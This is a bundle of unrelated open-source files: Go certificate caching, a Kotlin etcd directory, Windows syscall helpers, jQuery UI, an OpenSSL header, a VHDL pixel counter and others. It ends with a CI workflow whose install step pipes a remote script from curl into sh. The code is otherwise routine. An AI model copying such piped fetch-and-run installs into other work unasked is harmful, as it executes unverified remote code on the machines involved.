// copy of the Certificate that was put into the cache.
//
// This is a lower-level method; normally you'll call Manage() instead.
//
// This method is safe for concurrent use.
func (cfg *Config) CacheManagedCertificate(domain string) (Certificate, error) {
cert, err := cfg.loadManagedCertificate(domain)
if err != nil {
return cert, err
}
cfg.certCache.cacheCertificate(cert)
cfg.emit("cached_managed_cert", cert.Names)
return cert, nil
}
// loadManagedCertificate loads the managed certificate for domain,
// but it does not add it to the cache. It just loads from storage.
func (cfg *Config) loadManagedCertificate(domain string) (Certificate, error) {
certRes, err := cfg.loadCertResource(domain)
if err != nil {
return Certificate{}, err
}
cert, err := cfg.makeCertificateWithOCSP(certRes.CertificatePEM, certRes.PrivateKeyPEM)
if err != nil {
return cert, err
}
cert.managed = true
return cert, nil
}
// CacheUnmanagedCertificatePEMFile loads a certificate for host using certFile
// and keyFile, which must be in PEM format. It stores the certificate in
// the in-memory cache.
//
// This method is safe for concurrent use.
func (cfg *Config) CacheUnmanagedCertificatePEMFile(certFile, keyFile string, tags []string) error {
cert, err := cfg.makeCertificateFromDiskWithOCSP(cfg.Storage, certFile, keyFile)
if err != nil {
return err
}
cert.Tags = tags
cfg.certCache.cacheCertificate(cert)
cfg.emit("cached_unmanaged_cert", cert.Names)
return nil
}
// CacheUnmanagedTLSCertificate adds tlsCert to the certificate cache.
// It staples OCSP if possible.
//
// This method is safe for concurrent use.
func (cfg *Config) CacheUnmanagedTLSCertificate(tlsCert tls.Certificate, tags []string) error {
var cert Certificate
err := fillCertFromLeaf(&cert, tlsCert)
if err != nil {
return err
}
_, err = stapleOCSP(cfg.Storage, &cert, nil)
if err != nil && cfg.Logger != nil {
cfg.Logger.Warn("stapling OCSP", zap.Error(err))
}
cfg.emit("cached_unmanaged_cert", cert.Names)
cert.Tags = tags
cfg.certCache.cacheCertificate(cert)
return nil
}
// CacheUnmanagedCertificatePEMBytes makes a certificate out of the PEM bytes
// of the certificate and key, then caches it in memory.
//
// This method is safe for concurrent use.
func (cfg *Config) CacheUnmanagedCertificatePEMBytes(certBytes, keyBytes []byte, tags []string) error {
cert, err := cfg.makeCertificateWithOCSP(certBytes, keyBytes)
if err != nil {
return err
}
cert.Tags = tags
cfg.certCache.cacheCertificate(cert)
cfg.emit("cached_unmanaged_cert", cert.Names)
return nil
}
// makeCertificateFromDiskWithOCSP makes a Certificate by loading the
// certificate and key files. It fills out all the fields in
// the certificate except for the Managed and OnDemand flags.
// (It is up to the caller to set those.) It staples OCSP.
func (cfg Config) makeCertificateFromDiskWithOCSP(storage Storage, certFile, keyFile string) (Certificate, error) {
certPEMBlock, err := ioutil.ReadFile(certFile)
if err != nil {
return Certificate{}, err
}
keyPEMBlock, err := ioutil.ReadFile(keyFile)
if err != nil {
return Certificate{}, err
}
return cfg.makeCertificateWithOCSP(certPEMBlock, keyPEMBlock)
}
// makeCertificateWithOCSP is the same as makeCertificate except that it also
// staples OCSP to the certificate.
func (cfg Config) makeCertificateWithOCSP(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
cert, err := makeCertificate(certPEMBlock, keyPEMBlock)
if err != nil {
return cert, err
}
_, err = stapleOCSP(cfg.Storage, &cert, certPEMBlock)
if err != nil && cfg.Logger != nil {
cfg.Logger.Warn("stapling OCSP", zap.Error(err))
}
return cert, nil
}
// makeCertificate turns a certificate PEM bundle and a key PEM block into
// a Certificate with necessary metadata from parsing its bytes filled into
// its struct fields for convenience (except for the OnDemand and Managed
// flags; it is up to the caller to set those properties!). This function
// does NOT staple OCSP.
func makeCertificate(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
var cert Certificate
// Convert to a tls.Certificate
tlsCert, err := tls.X509KeyPair(certPEMBlock, keyPEMBlock)
if err != nil {
return cert, err
}
// Extract necessary metadata
err = fillCertFromLeaf(&cert, tlsCert)
if err != nil {
return cert, err
}
return cert, nil
}
// fillCertFromLeaf populates cert from tlsCert. If it succeeds, it
// guarantees that cert.Leaf is non-nil.
func fillCertFromLeaf(cert *Certificate, tlsCert tls.Certificate) error {
if len(tlsCert.Certificate) == 0 {
return fmt.Errorf("certificate is empty")
}
cert.Certificate = tlsCert
// the leaf cert should be the one for the site; we must set
// the tls.Certificate.Leaf field so that TLS handshakes are
// more efficient
leaf, err := x509.ParseCertificate(tlsCert.Certificate[0])
if err != nil {
return err
}
cert.Certificate.Leaf = leaf
// for convenience, we do want to assemble all the
// subjects on the certificate into one list
if leaf.Subject.CommonName != "" { // TODO: CommonName is deprecated
cert.Names = []string{strings.ToLower(leaf.Subject.CommonName)}
}
for _, name := range leaf.DNSNames {
if name != leaf.Subject.CommonName { // TODO: CommonName is deprecated
cert.Names = append(cert.Names, strings.ToLower(name))
}
}
for _, ip := range leaf.IPAddresses {
if ipStr := ip.String(); ipStr != leaf.Subject.CommonName { // TODO: CommonName is deprecated
cert.Names = append(cert.Names, strings.ToLower(ipStr))
}
}
for _, email := range leaf.EmailAddresses {
if email != leaf.Subject.CommonName { // TODO: CommonName is deprecated
cert.Names = append(cert.Names, strings.ToLower(email))
}
}
for _, u := range leaf.URIs {
if u.String() != leaf.Subject.CommonName { // TODO: CommonName is deprecated
cert.Names = append(cert.Names, u.String())
}
}
if len(cert.Names) == 0 {
return fmt.Errorf("certificate has no names")
}
// save the hash of this certificate (chain) and
// expiration date, for necessity and efficiency
cert.hash = hashCertificateChain(cert.Certificate.Certificate)
return nil
}
// managedCertInStorageExpiresSoon returns true if cert (being a
// managed certificate) is expiring within RenewDurationBefore.
// It returns false if there was an error checking the expiration
// of the certificate as found in storage, or if the certificate
// in storage is NOT expiring soon. A certificate that is expiring
// soon in our cache but is not expiring soon in storage probably
// means that another instance renewed the certificate in the
// meantime, and it would be a good idea to simply load the cert
// into our cache rather than repeating the renewal process again.
func (cfg *Config) managedCertInStorageExpiresSoon(cert Certificate) (bool, error) {
certRes, err := cfg.loadCertResource(cert.Names[0])
if err != nil {
return false, err
}
tlsCert, err := tls.X509KeyPair(certRes.CertificatePEM, certRes.PrivateKeyPEM)
if err != nil {
return false, err
}
leaf, err := x509.ParseCertificate(tlsCert.Certificate[0])
if err != nil {
return false, err
}
return currentlyInRenewalWindow(leaf.NotBefore, leaf.NotAfter, cfg.RenewalWindowRatio), nil
}
// reloadManagedCertificate reloads the certificate corresponding to the name(s)
// on oldCert into the cache, from storage. This also replaces the old certificate
// with the new one, so that all configurations that used the old cert now point
// to the new cert. It assumes that the new certificate for oldCert.Names[0] is
// already in storage.
func (cfg *Config) reloadManagedCertificate(oldCert Certificate) error {
if cfg.Logger != nil {
cfg.Logger.Info("reloading managed certificate", zap.Strings("identifiers", oldCert.Names))
}
newCert, err := cfg.loadManagedCertificate(oldCert.Names[0])
if err != nil {
return fmt.Errorf("loading managed certificate for %v from storage: %v", oldCert.Names, err)
}
cfg.certCache.replaceCertificate(oldCert, newCert)
return nil
}
// SubjectQualifiesForCert returns true if subj is a name which,
// as a quick sanity check, looks like it could be the subject
// of a certificate. Requirements are:
// - must not be empty
// - must not start or end with a dot (RFC 1034)
// - must not contain common accidental special characters
func SubjectQualifiesForCert(subj string) bool {
// must not be empty
return strings.TrimSpace(subj) != "" &&
// must not start or end with a dot
!strings.HasPrefix(subj, ".") &&
!strings.HasSuffix(subj, ".") &&
// if it has a wildcard, must be a left-most label
(!strings.Contains(subj, "*") || strings.HasPrefix(subj, "*.")) &&
// must not contain other common special characters
!strings.ContainsAny(subj, "()[]{}<> \t\n\"\\!@#$%^&|;'+=")
}
// SubjectQualifiesForPublicCert returns true if the subject
// name appears eligible for automagic TLS with a public
// CA such as Let's Encrypt. For example: localhost and IP
// addresses are not eligible because we cannot obtain certs
// for those names with a public CA. Wildcard names are
// allowed, as long as they conform to CABF requirements (only
// one wildcard label, and it must be the left-most label).
func SubjectQualifiesForPublicCert(subj string) bool {
// must at least qualify for certificate
return SubjectQualifiesForCert(subj) &&
// localhost is ineligible
subj != "localhost" &&
// .localhost TLD is ineligible
!strings.HasSuffix(subj, ".localhost") &&
// .local TLD is ineligible
!strings.HasSuffix(subj, ".local") &&
// only one wildcard label allowed, and it must be left-most
(!strings.Contains(subj, "*") ||
(strings.Count(subj, "*") == 1 &&
len(subj) > 2 &&
strings.HasPrefix(subj, "*."))) &&
// cannot be an IP address (as of yet), see
// https://community.letsencrypt.org/t/certificate-for-static-ip/84/2?u=mholt
net.ParseIP(subj) == nil
}
// MatchWildcard returns true if subject (a candidate DNS name)
// matches wildcard (a reference DNS name), mostly according to
// RFC6125-compliant wildcard rules.
func MatchWildcard(subject, wildcard string) bool {
if subject == wildcard {
return true
}
if !strings.Contains(wildcard, "*") {
return false
}
labels := strings.Split(subject, ".")
for i := range labels {
if labels[i] == "" {
continue // invalid label
}
labels[i] = "*"
candidate := strings.Join(labels, ".")
if candidate == wildcard {
return true
}
}
return false
}
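// matchWildcardExample is an editor's sketch (hypothetical names, not part of
// certmagic's API surface) showing the exported subject helpers defined above.
func matchWildcardExample() bool {
	// a single left-most wildcard label still qualifies for a public cert
	ok := SubjectQualifiesForPublicCert("*.example.com")
	// a candidate DNS name matched against a reference wildcard name
	return ok && MatchWildcard("sub.example.com", "*.example.com")
}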
| {
"pile_set_name": "Github"
} |
# Untitled
| {
"pile_set_name": "Github"
} |
version: '2.1'
services:
php:
image: '7.1'
build:
args:
version: 7.1-cli
| {
"pile_set_name": "Github"
} |
/*
Copyright (C) 2015 - 2019 Electronic Arts Inc. All rights reserved.
This file is part of the Orbit Project <https://www.orbit.cloud>.
See license in LICENSE.
*/
package orbit.server.etcd
import io.etcd.jetcd.ByteSequence
import io.etcd.jetcd.Client
import io.etcd.jetcd.options.GetOption
import io.etcd.jetcd.options.PutOption
import kotlinx.coroutines.TimeoutCancellationException
import kotlinx.coroutines.future.await
import kotlinx.coroutines.withTimeout
import mu.KotlinLogging
import orbit.server.mesh.AddressableDirectory
import orbit.shared.addressable.AddressableLease
import orbit.shared.addressable.NamespacedAddressableReference
import orbit.shared.proto.Addressable
import orbit.shared.proto.toAddressableLease
import orbit.shared.proto.toAddressableLeaseProto
import orbit.util.di.ExternallyConfigured
import orbit.util.time.Clock
import orbit.util.time.Timestamp
import java.util.concurrent.ExecutionException
import java.util.concurrent.atomic.AtomicBoolean
import java.util.concurrent.atomic.AtomicLong
class EtcdAddressableDirectory(config: EtcdAddressableDirectoryConfig, private val clock: Clock) :
AddressableDirectory {
data class EtcdAddressableDirectoryConfig(
val url: String = System.getenv("ADDRESSABLE_DIRECTORY") ?: "0.0.0.0"
) : ExternallyConfigured<AddressableDirectory> {
override val instanceType: Class<out AddressableDirectory> = EtcdAddressableDirectory::class.java
}
private val keyPrefix = "addressable"
private val allKey = ByteSequence.from("\u0000".toByteArray())
private val logger = KotlinLogging.logger { }
private val client = Client.builder().endpoints(config.url).build()
private val kvClient = client.kvClient
private val leaseClient = client.leaseClient
private val lastHealthCheckTime = AtomicLong(0)
private val lastHealthCheck = AtomicBoolean(false)
override suspend fun isHealthy(): Boolean {
if (lastHealthCheckTime.get() + 5000 > clock.currentTime) {
return lastHealthCheck.get()
}
try {
lastHealthCheckTime.set(clock.currentTime)
withTimeout(3000) {
getLease(Timestamp.now())
}
lastHealthCheck.set(true)
return true
} catch (e: TimeoutCancellationException) {
lastHealthCheck.set(false)
return false
} catch (e: ExecutionException) {
lastHealthCheck.set(false)
return false
}
}
override suspend fun count() =
kvClient.get(
allKey, GetOption.newBuilder()
.withSortField(GetOption.SortTarget.KEY)
.withSortOrder(GetOption.SortOrder.DESCEND)
.withPrefix(ByteSequence.from(keyPrefix.toByteArray()))
.withCountOnly(true)
.withRange(allKey)
.build()
).await().count
suspend fun getLease(time: Timestamp): PutOption {
val lease = leaseClient.grant(clock.until(time).seconds).await()
return PutOption.newBuilder().withLeaseId(lease.id).build()
}
override suspend fun get(key: NamespacedAddressableReference): AddressableLease? {
val response = kvClient.get(toByteKey(key)).await()
return response.kvs.firstOrNull()?.value?.let {
Addressable.AddressableLeaseProto.parseFrom(it.bytes).toAddressableLease()
}
}
override suspend fun remove(key: NamespacedAddressableReference): Boolean {
kvClient.delete(toByteKey(key))
return true
}
override suspend fun compareAndSet(
key: NamespacedAddressableReference,
initialValue: AddressableLease?,
newValue: AddressableLease?
): Boolean {
val byteKey = toByteKey(key)
val entry = kvClient.get(byteKey).await().kvs.firstOrNull()
val oldValue = entry?.value?.bytes?.let {
Addressable.AddressableLeaseProto.parseFrom(it).toAddressableLease()
}
if (initialValue == oldValue) {
if (newValue != null) {
kvClient.put(
byteKey,
ByteSequence.from(newValue.toAddressableLeaseProto().toByteArray()),
getLease(newValue.expiresAt)
).await()
} else {
kvClient.delete(byteKey).await()
}
return true
}
return false
}
private fun toByteKey(reference: NamespacedAddressableReference): ByteSequence {
return ByteSequence.from("$keyPrefix/${reference.namespace}/${reference.addressableReference.type}/${reference.addressableReference.key}".toByteArray())
}
}
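// --- Editor's usage sketch (hypothetical endpoint and clock wiring; in Orbit
// the instance is built by the DI container from the ExternallyConfigured
// config object rather than constructed by hand):
//
//   val config = EtcdAddressableDirectory.EtcdAddressableDirectoryConfig("http://127.0.0.1:2379")
//   val directory = EtcdAddressableDirectory(config, clock)  // clock: orbit.util.time.Clock
//   // suspend context required: directory.get(reference), directory.count(), ...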
| {
"pile_set_name": "Github"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build windows
// Package windows contains an interface to the low-level operating system
// primitives. OS details vary depending on the underlying system, and
// by default, godoc will display the OS-specific documentation for the current
// system. If you want godoc to display syscall documentation for another
// system, set $GOOS and $GOARCH to the desired system. For example, if
// you want to view documentation for freebsd/arm on linux/amd64, set $GOOS
// to freebsd and $GOARCH to arm.
//
// The primary use of this package is inside other packages that provide a more
// portable interface to the system, such as "os", "time" and "net". Use
// those packages rather than this one if you can.
//
// For details of the functions and data types in this package consult
// the manuals for the appropriate operating system.
//
// These calls return err == nil to indicate success; otherwise
// err represents an operating system error describing the failure and
// holds a value of type syscall.Errno.
package windows // import "golang.org/x/sys/windows"
import (
"syscall"
)
// ByteSliceFromString returns a NUL-terminated slice of bytes
// containing the text of s. If s contains a NUL byte at any
// location, it returns (nil, syscall.EINVAL).
func ByteSliceFromString(s string) ([]byte, error) {
for i := 0; i < len(s); i++ {
if s[i] == 0 {
return nil, syscall.EINVAL
}
}
a := make([]byte, len(s)+1)
copy(a, s)
return a, nil
}
// BytePtrFromString returns a pointer to a NUL-terminated array of
// bytes containing the text of s. If s contains a NUL byte at any
// location, it returns (nil, syscall.EINVAL).
func BytePtrFromString(s string) (*byte, error) {
a, err := ByteSliceFromString(s)
if err != nil {
return nil, err
}
return &a[0], nil
}
// Single-word zero for use when we need a valid pointer to 0 bytes.
// See mksyscall.pl.
var _zero uintptr
func (ts *Timespec) Unix() (sec int64, nsec int64) {
return int64(ts.Sec), int64(ts.Nsec)
}
func (tv *Timeval) Unix() (sec int64, nsec int64) {
return int64(tv.Sec), int64(tv.Usec) * 1000
}
func (ts *Timespec) Nano() int64 {
return int64(ts.Sec)*1e9 + int64(ts.Nsec)
}
func (tv *Timeval) Nano() int64 {
return int64(tv.Sec)*1e9 + int64(tv.Usec)*1000
}
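// bytePtrExample is an editor's sketch (hypothetical path value): converting
// a Go string for a NUL-terminated Windows API; an embedded NUL in the input
// would surface as syscall.EINVAL from BytePtrFromString.
func bytePtrExample() (*byte, error) {
	return BytePtrFromString(`C:\Temp`)
}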
| {
"pile_set_name": "Github"
} |
/*
* jQuery UI Effects Slide 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Slide
*
* Depends:
* effects.core.js
*/
(function($) {
$.effects.slide = function(o) {
return this.queue(function() {
// Create element
var el = $(this), props = ['position','top','left'];
// Set options
var mode = $.effects.setMode(el, o.options.mode || 'show'); // Set Mode
var direction = o.options.direction || 'left'; // Default Direction
// Adjust
$.effects.save(el, props); el.show(); // Save & Show
$.effects.createWrapper(el).css({overflow:'hidden'}); // Create Wrapper
var ref = (direction == 'up' || direction == 'down') ? 'top' : 'left';
var motion = (direction == 'up' || direction == 'left') ? 'pos' : 'neg';
var distance = o.options.distance || (ref == 'top' ? el.outerHeight({margin:true}) : el.outerWidth({margin:true}));
if (mode == 'show') el.css(ref, motion == 'pos' ? -distance : distance); // Shift
// Animation
var animation = {};
animation[ref] = (mode == 'show' ? (motion == 'pos' ? '+=' : '-=') : (motion == 'pos' ? '-=' : '+=')) + distance;
// Animate
el.animate(animation, { queue: false, duration: o.duration, easing: o.options.easing, complete: function() {
if(mode == 'hide') el.hide(); // Hide
$.effects.restore(el, props); $.effects.removeWrapper(el); // Restore
if(o.callback) o.callback.apply(this, arguments); // Callback
el.dequeue();
}});
});
};
})(jQuery);
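// --- Editor's usage sketch (hypothetical "#panel" element; assumes jQuery
// and effects.core.js are loaded). The effect is invoked through hide/show:
//
//   $( "#panel" ).hide( "slide", { direction: "left" }, 500 );
//   $( "#panel" ).show( "slide", { direction: "right" }, 500 );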
| {
"pile_set_name": "Github"
} |
**Welcome to Documentation.** You can go ahead and delete this page whenever you're ready. It contains some useful information and serves as a reference point for how pages will be styled. Every page in Documentation is formatted with Markdown (along with a couple of additions, which are demonstrated here).
## Features
* A simple & attractive interface for viewing & editing your pages
* Store pages in a hierarchy
* Modular authorisation architecture
* Modular search backend architecture
* Full i18n support
* Override any views as necessary within your Rails application
Recommendation: Take a look through all the pages in this guide while developing your application. If you delete this section, you can always re-add it by running `rake documentation:install_guides` from the root of your Rails application.
## Useful links
The links below provide you with easy access to key resources which will help you.
* [Browse source code on GitHub](https://github.com/adamcooke/documentation)
* [View issues](https://github.com/adamcooke/documentation/issues)
* [Check out the installation guide](https://github.com/adamcooke/documentation/blob/master/README.md) | {
"pile_set_name": "Github"
} |
/* Class = "NSTextFieldCell"; title = "Last Refreshed:"; ObjectID = "105"; */
"105.title" = "Sidst opdateret:";
/* Class = "NSButtonCell"; title = "Validate"; ObjectID = "109"; */
"109.title" = "Godkend";
/* Class = "NSTextFieldCell"; title = "User name:"; ObjectID = "111"; */
"111.title" = "Brugernavn:";
/* Class = "NSTextFieldCell"; title = "Password:"; ObjectID = "112"; */
"112.title" = "Kodeord:";
/* Class = "NSButtonCell"; title = "Update Authentication"; ObjectID = "115"; */
"115.title" = "Opdater autorisering";
/* Class = "NSTextFieldCell"; title = "Size:"; ObjectID = "117"; */
"117.title" = "Størrelse:";
/* Class = "NSTextFieldCell"; title = "Unread:"; ObjectID = "118"; */
"118.title" = "Ulæst:";
/* Class = "NSButtonCell"; title = "Subscribed"; ObjectID = "121"; */
"121.title" = "Abonneret";
/* Class = "NSButtonCell"; title = "Load Full HTML Articles"; ObjectID = "126"; */
"126.title" = "Hent fulde HTML-artikler";
/* Class = "NSTextFieldCell"; title = "Description"; ObjectID = "E84-Uo-ybg"; */
"E84-Uo-ybg.title" = "Beskrivelse";
/* Class = "NSTextFieldCell"; title = "General"; ObjectID = "i9j-KH-c3D"; */
"i9j-KH-c3D.title" = "Generelt";
/* Class = "NSTextFieldCell"; title = "Authentication"; ObjectID = "U0N-RF-bUt"; */
"U0N-RF-bUt.title" = "Autorisering";
/* Class = "NSTextFieldCell"; title = "Feed URL"; ObjectID = "xPF-M9-oZG"; */
"xPF-M9-oZG.title" = "Feed-henvisning";
/* Class = "NSButtonCell"; title = "Open Cached File…"; ObjectID = "xTj-hY-aTU"; */
"xTj-hY-aTU.title" = "Åben cachet arkiv…";
| {
"pile_set_name": "Github"
} |
export CGAL_DIR='/cygdrive/c/CGAL/reference_platforms/x64_Cygwin-Windows8_MSVC2010-Release-64bits'
export VC_VERSION="10"
export ARCH="64"
export PLATFORM_REFERENCE="/cygdrive/c/CGAL/reference_platforms"
source "${PLATFORM_REFERENCE}/setup_common"
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<base href="/">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>@ViewBag.Title - @T.Get("common.product")</title>
<environment names="Production">
<link rel="stylesheet" asp-append-version="true" href="@Url.RootContentUrl("~/build/app.css")" />
</environment>
@if (IsSectionDefined("header"))
{
@await RenderSectionAsync("header")
}
</head>
<body class="white">
<div class="profile @ViewBag.Class">
<img class="profile-logo" alt="@T.Get("common.product")S" title="@T.Get("common.product")" src="@Url.RootContentUrl("~/images/logo.svg")" />
@RenderBody()
</div>
<environment names="Development">
<script type="text/javascript" src="https://localhost:3000/shims.js"></script>
<script type="text/javascript" src="https://localhost:3000/app.js"></script>
</environment>
</body>
</html> | {
"pile_set_name": "Github"
} |
package com.uber.rave.model;
import androidx.annotation.NonNull;
import androidx.annotation.Size;
import androidx.annotation.StringDef;
import com.uber.rave.AnnotationSpecs;
import com.uber.rave.ObjectCreator;
import com.uber.rave.ObjectCreatorIncrementer;
import com.uber.rave.StringCreator;
import com.uber.rave.annotation.Validated;
import com.uber.rave.compiler.MyFactory;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
/**
* A simple example of using RAVE on a model class.
*/
@Validated(factory = MyFactory.class)
public class SingleMethodSampleModel {
public static final String MATCHED1 = "Matched";
public static final String MATCHED2 = "Matching";
public static final String MATCHED3 = "AlsoMatching";
@StringDef({MATCHED1, MATCHED2, MATCHED3})
@Retention(RetentionPolicy.SOURCE)
@interface TestStringDef { }
private String notNullField;
private String matchStringDef;
public SingleMethodSampleModel(String notNullField, String matchStringDef) {
this.notNullField = notNullField;
this.matchStringDef = matchStringDef;
}
/**
* @return An example method using the size annotation.
*/
@Size(min = 1, max = 20, multiple = 2)
@NonNull
public String getNotNullField() {
return notNullField;
}
@TestStringDef
@NonNull
public String getMatchStringDef() {
return matchStringDef;
}
public static class Builder extends ObjectCreator<SingleMethodSampleModel> {
ObjectCreatorIncrementer incrementer;
private final StringCreator notNullStringCreator = new StringCreator(1, 20, 2, false);
private final StringCreator matchStringDefStringCreator;
public Builder() {
AnnotationSpecs spec = new AnnotationSpecs.Builder()
.setIsNullable(false)
.setStringDef(MATCHED1, MATCHED2, MATCHED3)
.build();
matchStringDefStringCreator = new StringCreator(spec);
incrementer = new ObjectCreatorIncrementer(notNullStringCreator, matchStringDefStringCreator);
buildValidCases();
buildInvalidCases();
}
private void buildValidCases() {
while (incrementer.hasValidPermutations()) {
addValidType(new SingleMethodSampleModel(notNullStringCreator.getValidItem(),
matchStringDefStringCreator.getValidItem()));
incrementer.incrementValidCreators();
}
}
private void buildInvalidCases() {
while (incrementer.hasInvalidPermutations()) {
addInvalidType(new SingleMethodSampleModel(notNullStringCreator.getInvalidItem(),
matchStringDefStringCreator.getInvalidItem()));
incrementer.incrementInvalidCreators();
}
}
}
}
| {
"pile_set_name": "Github"
} |
library ieee;
use ieee.std_logic_1164.all;
use ieee.numeric_std_unsigned.all;
-- This module generates the pixel coordinates
-- for a 640x480 @ 60 Hz screen resolution.
-- This module expects an input clock frequency
-- of 25.175 MHz, but will work fine with 25.0 MHz.
entity pix is
port (
clk_i : in std_logic;
-- Pixel counters
pix_x_o : out std_logic_vector(9 downto 0);
pix_y_o : out std_logic_vector(9 downto 0)
);
end pix;
architecture structural of pix is
-- Define constants used for 640x480 @ 60 Hz.
-- Requires a clock of 25.175 MHz.
-- See page 17 in "VESA MONITOR TIMING STANDARD"
-- http://caxapa.ru/thumbs/361638/DMTv1r11.pdf
constant H_TOTAL : integer := 800;
constant V_TOTAL : integer := 525;
-- Pixel counters
signal pix_x : std_logic_vector(9 downto 0) := (others => '0');
signal pix_y : std_logic_vector(9 downto 0) := (others => '0');
begin
--------------------------------------------------
-- Generate horizontal and vertical pixel counters
--------------------------------------------------
pix_x_proc : process (clk_i)
begin
if rising_edge(clk_i) then
if pix_x = H_TOTAL-1 then
pix_x <= (others => '0');
else
pix_x <= pix_x + 1;
end if;
end if;
end process pix_x_proc;
pix_y_proc : process (clk_i)
begin
if rising_edge(clk_i) then
if pix_x = H_TOTAL-1 then
if pix_y = V_TOTAL-1 then
pix_y <= (others => '0');
else
pix_y <= pix_y + 1;
end if;
end if;
end if;
end process pix_y_proc;
------------------------
-- Drive output signals
------------------------
pix_x_o <= pix_x;
pix_y_o <= pix_y;
end architecture structural;
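-- --- Editor's usage sketch (hypothetical signal names): instantiate with a
-- 25.175 MHz pixel clock and consume the coordinates downstream:
--
--   i_pix : entity work.pix
--      port map (
--         clk_i   => vga_clk,
--         pix_x_o => pix_x,
--         pix_y_o => pix_y
--      );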
| {
"pile_set_name": "Github"
} |
/* crypto/mdc2/mdc2.h */
/* Copyright (C) 1995-1998 Eric Young ([email protected])
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young ([email protected]).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson ([email protected]).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young ([email protected])"
 * The word 'cryptographic' can be left out if the routines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson ([email protected])"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#ifndef HEADER_MDC2_H
#define HEADER_MDC2_H
#include <openssl/des.h>
#ifdef __cplusplus
extern "C" {
#endif
#ifdef NO_MDC2
#error MDC2 is disabled.
#endif
#define MDC2_BLOCK 8
#define MDC2_DIGEST_LENGTH 16
typedef struct mdc2_ctx_st
{
int num;
unsigned char data[MDC2_BLOCK];
des_cblock h,hh;
int pad_type; /* either 1 or 2, default 1 */
} MDC2_CTX;
void MDC2_Init(MDC2_CTX *c);
void MDC2_Update(MDC2_CTX *c, const unsigned char *data, unsigned long len);
void MDC2_Final(unsigned char *md, MDC2_CTX *c);
unsigned char *MDC2(const unsigned char *d, unsigned long n,
unsigned char *md);
#ifdef __cplusplus
}
#endif
#endif
name: test_backend
on:
push:
branches:
tags:
paths:
- '.github/workflows/ci-test-backend.yml'
- 'backend/**'
- '!backend/scripts/**'
pull_request:
paths:
- '.github/workflows/ci-test-backend.yml'
- 'backend/**'
- '!backend/scripts/**'
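# Note: the path filters above restrict both triggers to changes that can
# affect the backend: the workflow file itself and backend/**, excluding
# backend/scripts/** (a leading '!' re-excludes a previously matched path).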
jobs:
backend:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: debug if needed
run: if [[ "$DEBUG" == "true" ]]; then env; fi
env:
DEBUG: ${{secrets.DEBUG}}
- name: install go
uses: actions/setup-go@v1
with:
go-version: 1.14
- name: install golangci-lint and goveralls
run: |
curl -sfL https://raw.githubusercontent.com/golangci/golangci-lint/master/install.sh | sh -s -- -b $GITHUB_WORKSPACE v1.26.0
go get -u github.com/mattn/goveralls
- name: test and lint backend
run: |
go test -race -timeout=60s -covermode=atomic -coverprofile=$GITHUB_WORKSPACE/profile.cov_tmp ./...
cat $GITHUB_WORKSPACE/profile.cov_tmp | grep -v "_mock.go" > $GITHUB_WORKSPACE/profile.cov
$GITHUB_WORKSPACE/golangci-lint --config ${GITHUB_WORKSPACE}/backend/.golangci.yml run --out-format=github-actions ./...
working-directory: backend/app
env:
GOFLAGS: "-mod=vendor"
TZ: "America/Chicago"
- name: test and lint examples
run: |
go version
$GITHUB_WORKSPACE/golangci-lint version
go test -race ./...
$GITHUB_WORKSPACE/golangci-lint --config ${GITHUB_WORKSPACE}/backend/.golangci.yml run --out-format=github-actions ./...
working-directory: backend/_example/memory_store
env:
TZ: "America/Chicago"
- name: submit coverage
run: $(go env GOPATH)/bin/goveralls -service="github" -coverprofile=$GITHUB_WORKSPACE/profile.cov
working-directory: backend
env:
COVERALLS_TOKEN: ${{ secrets.GITHUB_TOKEN }}
